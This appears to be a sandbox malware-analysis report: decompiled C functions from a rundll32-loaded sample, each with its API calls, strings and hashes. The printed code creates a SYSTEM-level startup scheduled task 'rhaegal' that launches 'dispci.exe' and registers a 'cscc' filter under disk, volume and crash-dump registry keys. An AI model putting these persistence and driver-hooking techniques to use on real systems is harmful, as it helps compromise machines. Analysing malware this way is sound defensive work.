                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,047754D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04771E97
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,?,?,047754D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04771EA2
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,047754D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04771EA9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$AllocFree$htonsmemsetrecvsend
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 255267840-0
                                                                                                                                                  • Opcode ID: 8aec25ef23dc6f577595cd0df47357d11d04e69d985766339d8e632f938ddff3
                                                                                                                                                  • Instruction ID: 1c5f81965f36b057dcec72ff8e716f6125e6796121b13df1ae3f580dbd10db96
                                                                                                                                                  • Opcode Fuzzy Hash: 8aec25ef23dc6f577595cd0df47357d11d04e69d985766339d8e632f938ddff3
                                                                                                                                                  • Instruction Fuzzy Hash: 2421D671600245BBEF205FA4CC49FAA7B68FF49300F448065FA049B380DBB8DC04C764
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 54%
                                                                                                                                                  			E04778A6F(void* __ecx, void* _a4) {
                                                                                                                                                  				void* _v0;
                                                                                                                                                  				void* _v12;
                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                  				void _v24;
                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				int _t11;
                                                                                                                                                  				intOrPtr _t13;
                                                                                                                                                  				void* _t17;
                                                                                                                                                  				void* _t23;
                                                                                                                                                  				void _t24;
                                                                                                                                                  				void* _t26;
                                                                                                                                                  				void* _t27;
                                                                                                                                                  				intOrPtr* _t29;
                                                                                                                                                  				void* _t30;
                                                                                                                                                  				void* _t31;
                                                                                                                                                  
                                                                                                                                                  				_t27 = __ecx;
                                                                                                                                                  				_t30 = GetSystemMetrics;
                                                                                                                                                  				_t11 = GetSystemMetrics(0x2000); // executed
                                                                                                                                                  				_t23 = Sleep;
                                                                                                                                                  				while(_t11 == 0) {
                                                                                                                                                  					Sleep(0x1f4); // executed
                                                                                                                                                  					_t11 = GetSystemMetrics(0x2000);
                                                                                                                                                  				}
                                                                                                                                                  				if(SetEvent(_a4) != 0) {
                                                                                                                                                  					Sleep(0x3e8);
                                                                                                                                                  				}
                                                                                                                                                  				E04778A23();
                                                                                                                                                  				asm("int3");
                                                                                                                                                  				_push(_t27);
                                                                                                                                                  				_push(_t27);
                                                                                                                                                  				_push(_t23);
                                                                                                                                                  				_push(_t30);
                                                                                                                                                  				_t31 = _v12;
                                                                                                                                                  				_t24 =  *_t31;
                                                                                                                                                  				_t13 =  *((intOrPtr*)(_t31 + 4));
                                                                                                                                                  				_push(0x2000);
                                                                                                                                                  				_v24 = _t24;
                                                                                                                                                  				_v28 = _t13;
                                                                                                                                                  				if(_t24 < _t13) {
                                                                                                                                                  					_t29 = __imp__#14;
                                                                                                                                                  					do {
                                                                                                                                                  						_t17 = E0477A567( *_t29(_t24)); // executed
                                                                                                                                                  						if(_t17 != 0) {
                                                                                                                                                  							__imp__#12( *_t29(_t24));
                                                                                                                                                  							_t26 = E0477641A(_t18);
                                                                                                                                                  							if(_t26 != 0) {
                                                                                                                                                  								E04776B95(_t19, 0,  *((intOrPtr*)(_t31 + 8)));
                                                                                                                                                  								HeapFree(GetProcessHeap(), 0, _t26);
                                                                                                                                                  								_t31 = _v0;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						_t24 = _v12 + 1;
                                                                                                                                                  						_v12 = _t24;
                                                                                                                                                  					} while (_t24 < _v16);
                                                                                                                                                  				}
                                                                                                                                                  				LocalFree(_t31);
                                                                                                                                                  				return 0;
                                                                                                                                                  			}



















                                                                                                                                                  0x04778a6f
                                                                                                                                                  0x04778a74
                                                                                                                                                  0x04778a81
                                                                                                                                                  0x04778a83
                                                                                                                                                  0x04778a95
                                                                                                                                                  0x04778a90
                                                                                                                                                  0x04778a93
                                                                                                                                                  0x04778a93
                                                                                                                                                  0x04778aa4
                                                                                                                                                  0x04778aab
                                                                                                                                                  0x04778aab
                                                                                                                                                  0x04778aad
                                                                                                                                                  0x04778ab2
                                                                                                                                                  0x04778ab6
                                                                                                                                                  0x04778ab7
                                                                                                                                                  0x04778ab8
                                                                                                                                                  0x04778ab9
                                                                                                                                                  0x04778aba
                                                                                                                                                  0x04778abd
                                                                                                                                                  0x04778abf
                                                                                                                                                  0x04778ac2
                                                                                                                                                  0x04778ac3
                                                                                                                                                  0x04778ac6
                                                                                                                                                  0x04778acb
                                                                                                                                                  0x04778acd
                                                                                                                                                  0x04778ad3
                                                                                                                                                  0x04778ad7
                                                                                                                                                  0x04778ade
                                                                                                                                                  0x04778ae4
                                                                                                                                                  0x04778af0
                                                                                                                                                  0x04778af4
                                                                                                                                                  0x04778afb
                                                                                                                                                  0x04778b09
                                                                                                                                                  0x04778b0f
                                                                                                                                                  0x04778b0f
                                                                                                                                                  0x04778af4
                                                                                                                                                  0x04778b15
                                                                                                                                                  0x04778b16
                                                                                                                                                  0x04778b19
                                                                                                                                                  0x04778ad3
                                                                                                                                                  0x04778b1f
                                                                                                                                                  0x04778b2b

                                                                                                                                                  APIs
                                                                                                                                                  • GetSystemMetrics.USER32 ref: 04778A81
                                                                                                                                                  • Sleep.KERNELBASE(000001F4), ref: 04778A90
                                                                                                                                                  • GetSystemMetrics.USER32 ref: 04778A93
                                                                                                                                                  • SetEvent.KERNEL32(?), ref: 04778A9C
                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 04778AAB
                                                                                                                                                  • htonl.WS2_32(74CB6490), ref: 04778AD4
                                                                                                                                                  • htonl.WS2_32(74CB6490), ref: 04778AE1
                                                                                                                                                  • inet_ntoa.WS2_32(00000000), ref: 04778AE4
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?,00000000), ref: 04778B02
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,00000000), ref: 04778B09
                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 04778B1F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeHeapMetricsSleepSystemhtonl$EventLocalProcessinet_ntoa
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4223591894-0
                                                                                                                                                  • Opcode ID: 91a4c9443c47850ec1404f8628aa3ac2000272b49f4079cd9c6b058c35328683
                                                                                                                                                  • Instruction ID: 93a180f8f515ea8c272ce164722eb900007a21dc9bb87a02b24bd43d3d4051d0
                                                                                                                                                  • Opcode Fuzzy Hash: 91a4c9443c47850ec1404f8628aa3ac2000272b49f4079cd9c6b058c35328683
                                                                                                                                                  • Instruction Fuzzy Hash: 1F119071A00305BBEB20BFA5CD8CD9F77ACEF493507968824F601A3201DA78FD018AB1
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E04777FB7(intOrPtr _a4, signed int _a8) {
                                                                                                                                                  				struct _PROCESS_INFORMATION _v20;
                                                                                                                                                  				struct _STARTUPINFOW _v88;
                                                                                                                                                  				short _v1648;
                                                                                                                                                  				short _v1650;
                                                                                                                                                  				short _v3696;
                                                                                                                                                  				char* _t20;
                                                                                                                                                  				char* _t21;
                                                                                                                                                  				int _t26;
                                                                                                                                                  				void* _t35;
                                                                                                                                                  				long _t36;
                                                                                                                                                  				long _t37;
                                                                                                                                                  				int _t38;
                                                                                                                                                  
                                                                                                                                                  				_t38 = 0;
                                                                                                                                                  				wsprintfW( &_v3696, L"/c %ws", _a4);
                                                                                                                                                  				_v1650 = 0;
                                                                                                                                                  				if(GetEnvironmentVariableW(L"ComSpec",  &_v1648, 0x30c) != 0 || GetSystemDirectoryW( &_v1648, 0x30c) != 0 && lstrcatW( &_v1648, L"\\cmd.exe") != 0) {
                                                                                                                                                  					_t35 = 0x10;
                                                                                                                                                  					_t20 =  &_v20;
                                                                                                                                                  					do {
                                                                                                                                                  						 *_t20 = 0;
                                                                                                                                                  						_t20 = _t20 + 1;
                                                                                                                                                  						_t35 = _t35 - 1;
                                                                                                                                                  					} while (_t35 != 0);
                                                                                                                                                  					_t36 = 0x44;
                                                                                                                                                  					_t37 = _t36;
                                                                                                                                                  					_t21 =  &_v88;
                                                                                                                                                  					do {
                                                                                                                                                  						 *_t21 = 0;
                                                                                                                                                  						_t21 = _t21 + 1;
                                                                                                                                                  						_t37 = _t37 - 1;
                                                                                                                                                  					} while (_t37 != 0);
                                                                                                                                                  					_v88.cb = _t36;
                                                                                                                                                  					_t26 = CreateProcessW( &_v1648,  &_v3696, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20); // executed
                                                                                                                                                  					_t38 = _t26;
                                                                                                                                                  					if(_t38 != 0) {
                                                                                                                                                  						Sleep(_a8 * 0x3e8); // executed
                                                                                                                                                  					}
                                                                                                                                                  					goto L9;
                                                                                                                                                  				} else {
                                                                                                                                                  					L9:
                                                                                                                                                  					return _t38;
                                                                                                                                                  				}
                                                                                                                                                  			}















                                                                                                                                                  0x04777fd4
                                                                                                                                                  0x04777fd6
                                                                                                                                                  0x04777fe1
                                                                                                                                                  0x04778002
                                                                                                                                                  0x0477802e
                                                                                                                                                  0x0477802f
                                                                                                                                                  0x04778032
                                                                                                                                                  0x04778032
                                                                                                                                                  0x04778034
                                                                                                                                                  0x04778035
                                                                                                                                                  0x04778035
                                                                                                                                                  0x0477803a
                                                                                                                                                  0x0477803b
                                                                                                                                                  0x0477803d
                                                                                                                                                  0x04778040
                                                                                                                                                  0x04778040
                                                                                                                                                  0x04778042
                                                                                                                                                  0x04778043
                                                                                                                                                  0x04778043
                                                                                                                                                  0x04778066
                                                                                                                                                  0x04778069
                                                                                                                                                  0x0477806f
                                                                                                                                                  0x04778073
                                                                                                                                                  0x0477807f
                                                                                                                                                  0x0477807f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04778085
                                                                                                                                                  0x04778085
                                                                                                                                                  0x0477808b
                                                                                                                                                  0x0477808b

                                                                                                                                                  APIs
                                                                                                                                                  • wsprintfW.USER32 ref: 04777FD6
                                                                                                                                                  • GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 04777FFA
                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 0477800C
                                                                                                                                                  • lstrcatW.KERNEL32(?,\cmd.exe), ref: 04778022
                                                                                                                                                  • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 04778069
                                                                                                                                                  • Sleep.KERNELBASE(00000000), ref: 0477807F
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateDirectoryEnvironmentProcessSleepSystemVariablelstrcatwsprintf
                                                                                                                                                  • String ID: /c %ws$ComSpec$\cmd.exe
                                                                                                                                                  • API String ID: 1518394870-1564754240
                                                                                                                                                  • Opcode ID: e05c1ec7294482ac8c3f421ed725b19403ab3b723d0044b801aee19d45d5181e
                                                                                                                                                  • Instruction ID: 97451442cfa832bc7e092018eec412401e42442afca840258ca4a7186ce70391
                                                                                                                                                  • Opcode Fuzzy Hash: e05c1ec7294482ac8c3f421ed725b19403ab3b723d0044b801aee19d45d5181e
                                                                                                                                                  • Instruction Fuzzy Hash: B021B0B26001086BEB20ABA4DD88EEB77ADEB94341F518466F505E6240E635DE48CB30
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E04771000(void* __eflags, intOrPtr _a4) {
                                                                                                                                                  				short _v524;
                                                                                                                                                  				short _v1564;
                                                                                                                                                  				void* _t8;
                                                                                                                                                  				signed int _t15;
                                                                                                                                                  				signed int _t21;
                                                                                                                                                  
                                                                                                                                                  				_t21 = 0;
                                                                                                                                                  				_t8 = E04777FB7(L"schtasks /Delete /F /TN rhaegal", 0); // executed
                                                                                                                                                  				if(_t8 != 0) {
                                                                                                                                                  					Sleep(0x7d0); // executed
                                                                                                                                                  				}
                                                                                                                                                  				if(GetEnvironmentVariableW(L"ComSpec",  &_v524, 0x104) != 0 || GetSystemDirectoryW( &_v524, 0x104) != 0 && lstrcatW( &_v524, L"\\cmd.exe") != 0) {
                                                                                                                                                  					wsprintfW( &_v1564, L"schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR \"%ws /C Start \\\"\\\" \\\"%wsdispci.exe\\\" -id %u && exit\"",  &_v524, _a4,  *0x4787bbc);
                                                                                                                                                  					_t15 = E04777FB7( &_v1564, _t21); // executed
                                                                                                                                                  					_t21 = _t15;
                                                                                                                                                  				}
                                                                                                                                                  				return _t21;
                                                                                                                                                  			}








                                                                                                                                                  0x0477100b
                                                                                                                                                  0x04771013
                                                                                                                                                  0x0477101a
                                                                                                                                                  0x04771021
                                                                                                                                                  0x04771021
                                                                                                                                                  0x04771041
                                                                                                                                                  0x04771087
                                                                                                                                                  0x04771098
                                                                                                                                                  0x0477109d
                                                                                                                                                  0x0477109d
                                                                                                                                                  0x047710a4

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 04777FB7: wsprintfW.USER32 ref: 04777FD6
                                                                                                                                                    • Part of subcall function 04777FB7: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 04777FFA
                                                                                                                                                    • Part of subcall function 04777FB7: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 0477800C
                                                                                                                                                    • Part of subcall function 04777FB7: lstrcatW.KERNEL32(?,\cmd.exe), ref: 04778022
                                                                                                                                                    • Part of subcall function 04777FB7: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 04778069
                                                                                                                                                    • Part of subcall function 04777FB7: Sleep.KERNELBASE(00000000), ref: 0477807F
                                                                                                                                                  • Sleep.KERNELBASE(000007D0,schtasks /Delete /F /TN rhaegal,00000000,?,00000000), ref: 04771021
                                                                                                                                                  • GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,schtasks /Delete /F /TN rhaegal,00000000,?,00000000), ref: 04771039
                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0477104B
                                                                                                                                                  • lstrcatW.KERNEL32(?,\cmd.exe), ref: 04771061
                                                                                                                                                  • wsprintfW.USER32 ref: 04771087
                                                                                                                                                  Strings
                                                                                                                                                  • schtasks /Delete /F /TN rhaegal, xrefs: 0477100E
                                                                                                                                                  • ComSpec, xrefs: 04771034
                                                                                                                                                  • schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "%ws /C Start \"\" \"%wsdispci.exe\" -id %u && exit", xrefs: 04771081
                                                                                                                                                  • \cmd.exe, xrefs: 04771055
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DirectoryEnvironmentSleepSystemVariablelstrcatwsprintf$CreateProcess
                                                                                                                                                  • String ID: ComSpec$\cmd.exe$schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "%ws /C Start \"\" \"%wsdispci.exe\" -id %u && exit"$schtasks /Delete /F /TN rhaegal
                                                                                                                                                  • API String ID: 2538701606-2521368254
                                                                                                                                                  • Opcode ID: 2fc138741bd3ea522f74f910ea80ecc6abe5bb378ef27c84d37e134d15e21233
                                                                                                                                                  • Instruction ID: ff4222113bf9e82cc5c3714a167ed5d78c002f9475e3fbe2468ba5fd5a0e7334
                                                                                                                                                  • Opcode Fuzzy Hash: 2fc138741bd3ea522f74f910ea80ecc6abe5bb378ef27c84d37e134d15e21233
                                                                                                                                                  • Instruction Fuzzy Hash: 8801D2B26002186BDF30AA759C0CED7377DEF85605F8044A5BA05E2300EA34EA45CBB0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E04771531() {
                                                                                                                                                  				void* _t3;
                                                                                                                                                  				void* _t4;
                                                                                                                                                  				void* _t5;
                                                                                                                                                  				void* _t7;
                                                                                                                                                  				void* _t9;
                                                                                                                                                  				signed int _t11;
                                                                                                                                                  				void* _t13;
                                                                                                                                                  
                                                                                                                                                  				_t3 = 0;
                                                                                                                                                  				do {
                                                                                                                                                  					_t11 =  *(_t3 + L"cscc") & 0x0000ffff;
                                                                                                                                                  					 *(_t3 + L"cscc") = _t11;
                                                                                                                                                  					_t3 = _t3 + 2;
                                                                                                                                                  				} while (_t11 != 0);
                                                                                                                                                  				_t4 = E04771368(_t11); // executed
                                                                                                                                                  				_t13 = _t4;
                                                                                                                                                  				if(_t13 == 0 || E047713E8() != 0) {
                                                                                                                                                  					_t5 = E047711EF(L"SYSTEM\\CurrentControlSet\\Control\\Class\\{71A27CDD-812A-11D0-BEC7-08002BE2092F}", L"LowerFilters"); // executed
                                                                                                                                                  					_t13 = _t5;
                                                                                                                                                  					if(_t13 == 0) {
                                                                                                                                                  						_t7 = E047711EF(L"SYSTEM\\CurrentControlSet\\Control\\Class\\{4D36E965-E325-11CE-BFC1-08002BE10318}", L"UpperFilters"); // executed
                                                                                                                                                  						_t13 = _t7;
                                                                                                                                                  						if(_t13 == 0 && GetVersion() >= 6) {
                                                                                                                                                  							_t9 = E047711EF(L"SYSTEM\\CurrentControlSet\\Control\\CrashControl", L"DumpFilters"); // executed
                                                                                                                                                  							_t13 = _t9;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t13;
                                                                                                                                                  			}










                                                                                                                                                  0x04771531
                                                                                                                                                  0x04771533
                                                                                                                                                  0x04771533
                                                                                                                                                  0x0477153a
                                                                                                                                                  0x04771541
                                                                                                                                                  0x04771544
                                                                                                                                                  0x0477154a
                                                                                                                                                  0x0477154f
                                                                                                                                                  0x04771553
                                                                                                                                                  0x04771568
                                                                                                                                                  0x0477156d
                                                                                                                                                  0x04771571
                                                                                                                                                  0x0477157d
                                                                                                                                                  0x04771582
                                                                                                                                                  0x04771586
                                                                                                                                                  0x0477159c
                                                                                                                                                  0x047715a1
                                                                                                                                                  0x047715a1
                                                                                                                                                  0x04771586
                                                                                                                                                  0x04771571
                                                                                                                                                  0x047715a6

                                                                                                                                                  APIs
                                                                                                                                                  • GetVersion.KERNEL32(SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318},UpperFilters,SYSTEM\CurrentControlSet\Control\Class\{71A27CDD-812A-11D0-BEC7-08002BE2092F},LowerFilters,00000000,047711D0,?,?,?), ref: 04771588
                                                                                                                                                  Strings
                                                                                                                                                  • LowerFilters, xrefs: 0477155E
                                                                                                                                                  • cscc, xrefs: 04771533
                                                                                                                                                  • DumpFilters, xrefs: 04771592
                                                                                                                                                  • SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318}, xrefs: 04771578
                                                                                                                                                  • SYSTEM\CurrentControlSet\Control\CrashControl, xrefs: 04771597
                                                                                                                                                  • SYSTEM\CurrentControlSet\Control\Class\{71A27CDD-812A-11D0-BEC7-08002BE2092F}, xrefs: 04771563
                                                                                                                                                  • UpperFilters, xrefs: 04771573
                                                                                                                                                  • cscc, xrefs: 0477153A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Version
                                                                                                                                                  • String ID: DumpFilters$LowerFilters$SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318}$SYSTEM\CurrentControlSet\Control\Class\{71A27CDD-812A-11D0-BEC7-08002BE2092F}$SYSTEM\CurrentControlSet\Control\CrashControl$UpperFilters$cscc$cscc
                                                                                                                                                  • API String ID: 1889659487-625840244
                                                                                                                                                  • Opcode ID: b8e40383bcff51f97b36504f9212996478a4094b6c9e1484cf0bdda389f2dad0
                                                                                                                                                  • Instruction ID: 1b35d543651eafb7f3d3d1cff258f6f3696397d272b4e54fee489a1f2bbfc21b
                                                                                                                                                  • Opcode Fuzzy Hash: b8e40383bcff51f97b36504f9212996478a4094b6c9e1484cf0bdda389f2dad0
                                                                                                                                                  • Instruction Fuzzy Hash: 74F01272FC1762571FB536E8E91A9590581DE01AA93C74198FC42BB702EA44FE0987A1
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                                  			E047711EF(int _a4, short* _a8) {
                                                                                                                                                  				long _v8;
                                                                                                                                                  				void* _v12;
                                                                                                                                                  				int _v16;
                                                                                                                                                  				char _v2064;
                                                                                                                                                  				long _t42;
                                                                                                                                                  				intOrPtr* _t43;
                                                                                                                                                  				long _t49;
                                                                                                                                                  				long _t60;
                                                                                                                                                  				char* _t62;
                                                                                                                                                  				char* _t63;
                                                                                                                                                  				int _t68;
                                                                                                                                                  				intOrPtr _t70;
                                                                                                                                                  				intOrPtr* _t71;
                                                                                                                                                  				char _t72;
                                                                                                                                                  				int _t73;
                                                                                                                                                  				void* _t74;
                                                                                                                                                  				char _t75;
                                                                                                                                                  				char* _t76;
                                                                                                                                                  				char _t77;
                                                                                                                                                  				char* _t79;
                                                                                                                                                  				void* _t81;
                                                                                                                                                  
                                                                                                                                                  				_t42 = RegOpenKeyW(0x80000002, _a4,  &_v12); // executed
                                                                                                                                                  				if(_t42 != 0) {
                                                                                                                                                  					return _t42;
                                                                                                                                                  				}
                                                                                                                                                  				_t43 = L"cscc";
                                                                                                                                                  				_t74 = _t43 + 2;
                                                                                                                                                  				do {
                                                                                                                                                  					_t70 =  *_t43;
                                                                                                                                                  					_t43 = _t43 + 2;
                                                                                                                                                  				} while (_t70 != 0);
                                                                                                                                                  				_t68 = (_t43 - _t74 >> 1) + (_t43 - _t74 >> 1) + 2;
                                                                                                                                                  				_t79 =  &_v2064;
                                                                                                                                                  				_a4 = 0x800;
                                                                                                                                                  				_t49 = RegQueryValueExW(_v12, _a8, 0,  &_v16, _t79,  &_a4); // executed
                                                                                                                                                  				_v8 = _t49;
                                                                                                                                                  				if(_t49 == 0) {
                                                                                                                                                  					if(_v16 != 7 || _a4 + _t68 > 0x800) {
                                                                                                                                                  						_v8 = 0x65d;
                                                                                                                                                  						goto L23;
                                                                                                                                                  					} else {
                                                                                                                                                  						if(_v2064 == 0) {
                                                                                                                                                  							L20:
                                                                                                                                                  							memmove(_t81 + _t68 - 0x80c,  &_v2064, _a4);
                                                                                                                                                  							memcpy( &_v2064, L"cscc", _t68);
                                                                                                                                                  							_a4 = _a4 + _t68;
                                                                                                                                                  							_t60 = RegSetValueExW(_v12, _a8, 0, 7,  &_v2064, _a4); // executed
                                                                                                                                                  							_v8 = _t60;
                                                                                                                                                  							if(_t60 == 0) {
                                                                                                                                                  								_v8 = RegFlushKey(_v12);
                                                                                                                                                  							}
                                                                                                                                                  							L23:
                                                                                                                                                  							RegCloseKey(_v12); // executed
                                                                                                                                                  							return _v8;
                                                                                                                                                  						} else {
                                                                                                                                                  							goto L9;
                                                                                                                                                  						}
                                                                                                                                                  						do {
                                                                                                                                                  							L9:
                                                                                                                                                  							_t71 = L"cscc";
                                                                                                                                                  							_t62 = _t79;
                                                                                                                                                  							while(1) {
                                                                                                                                                  								_t75 =  *_t62;
                                                                                                                                                  								if(_t75 !=  *_t71) {
                                                                                                                                                  									break;
                                                                                                                                                  								}
                                                                                                                                                  								if(_t75 == 0) {
                                                                                                                                                  									L14:
                                                                                                                                                  									_t62 = 0;
                                                                                                                                                  									L16:
                                                                                                                                                  									if(_t62 == 0) {
                                                                                                                                                  										goto L23;
                                                                                                                                                  									}
                                                                                                                                                  									_t63 = _t79;
                                                                                                                                                  									_t76 =  &(_t63[2]);
                                                                                                                                                  									do {
                                                                                                                                                  										_t72 =  *_t63;
                                                                                                                                                  										_t63 =  &(_t63[2]);
                                                                                                                                                  									} while (_t72 != 0);
                                                                                                                                                  									goto L19;
                                                                                                                                                  								}
                                                                                                                                                  								_t77 = _t62[2];
                                                                                                                                                  								if(_t77 !=  *((intOrPtr*)(_t71 + 2))) {
                                                                                                                                                  									break;
                                                                                                                                                  								}
                                                                                                                                                  								_t62 =  &(_t62[4]);
                                                                                                                                                  								_t71 = _t71 + 4;
                                                                                                                                                  								if(_t77 != 0) {
                                                                                                                                                  									continue;
                                                                                                                                                  								}
                                                                                                                                                  								goto L14;
                                                                                                                                                  							}
                                                                                                                                                  							asm("sbb eax, eax");
                                                                                                                                                  							asm("sbb eax, 0xffffffff");
                                                                                                                                                  							goto L16;
                                                                                                                                                  							L19:
                                                                                                                                                  							_t79 =  &(_t79[2 + (_t63 - _t76 >> 1) * 2]);
                                                                                                                                                  						} while ( *_t79 != _t72);
                                                                                                                                                  						goto L20;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_t73 = 2;
                                                                                                                                                  				if(_t49 != _t73) {
                                                                                                                                                  					goto L23;
                                                                                                                                                  				}
                                                                                                                                                  				_v2064 = 0;
                                                                                                                                                  				_a4 = _t73;
                                                                                                                                                  				goto L20;
                                                                                                                                                  			}
























                                                                                                                                                  0x04771204
                                                                                                                                                  0x0477120c
                                                                                                                                                  0x04771365
                                                                                                                                                  0x04771365
                                                                                                                                                  0x04771212
                                                                                                                                                  0x04771217
                                                                                                                                                  0x0477121a
                                                                                                                                                  0x0477121a
                                                                                                                                                  0x0477121d
                                                                                                                                                  0x04771220
                                                                                                                                                  0x0477122b
                                                                                                                                                  0x04771233
                                                                                                                                                  0x04771245
                                                                                                                                                  0x0477124f
                                                                                                                                                  0x04771255
                                                                                                                                                  0x0477125a
                                                                                                                                                  0x04771279
